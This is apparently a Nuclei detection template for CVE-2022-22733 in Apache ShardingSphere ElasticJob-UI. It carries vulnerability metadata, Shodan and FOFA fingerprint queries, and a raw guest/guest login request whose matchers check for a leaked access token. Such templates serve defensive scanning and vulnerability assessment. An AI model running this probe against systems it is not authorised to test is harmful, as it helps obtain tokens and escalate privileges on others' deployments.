id: CVE-2022-22733 info: name: Apache ShardingSphere ElasticJob-UI privilege escalation author: Zeyad Azima severity: medium description: | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. impact: | Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application. remediation: | Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. reference: - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation - https://nvd.nist.gov/vuln/detail/CVE-2022-22733 - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6 - http://www.openwall.com/lists/oss-security/2022/01/20/2 - https://github.com/Zeyad-Azima/CVE-2022-22733 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 epss-score: 0.2493 epss-percentile: 0.96665 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 fofa-query: icon_hash=816588900 tags: cve2022,cve,exposure,sharingsphere,apache http: - raw: - | POST /api/login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* Access-Token: Content-Type: application/json;charset=UTF-8 Origin: {{RootURL}} Referer: {{RootURL}} {"username":"guest","password":"guest"} matchers-condition: and matchers: - type: word part: body words: - '"success":true' - '"isGuest":true' - '"accessToken":' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 490a0046304402206caf689c010af6339cb5400f8935265a009126993b2e9eb7225757a1fd1e970702205990fe4415667628846e7c83a4ca6c01b80a91d97b5b418eb014783b10fe9ad7:922c64590222798bb761d5b6d8e72950